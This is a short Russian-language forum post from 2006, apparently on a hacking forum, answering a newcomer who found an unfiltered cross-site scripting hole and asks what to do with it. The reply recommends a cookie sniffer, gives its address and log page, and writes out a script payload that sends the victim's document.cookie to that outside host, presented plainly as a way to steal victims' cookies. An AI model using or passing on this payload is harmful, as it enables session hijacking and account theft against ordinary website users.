15.08.2006, 11:28
|
|
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453
Репутация:
113
|
|
Сообщение от INDAHO
Код:
"><script>alert(document.cookie);</script>
тоесть никакие знаки не фильтруются. Так вот какои вопрос: что можно сделать ... чего добится? Извините за ньюбство  Но просто хотелось бы знать многие варианты действий, которые можно совершить. 1) Юзай сниффер!
Вот те мануал http://antichat.ru/sniff/
Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg
Лог сниффера: http://antichat.ru/sniff/log.php
Можешь и персональный юзать например в http://s.netsec.ru
Далее в алерт впихаешь сниффа + документ кукис ... чтоб заполучить кукисы жертвы
Например:
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Как только скрипт выполнится , можешь посмотреть на логи сниффера и хитро улыбатся =)
Последний раз редактировалось Electro; 15.08.2006 в 11:32..
|
|
|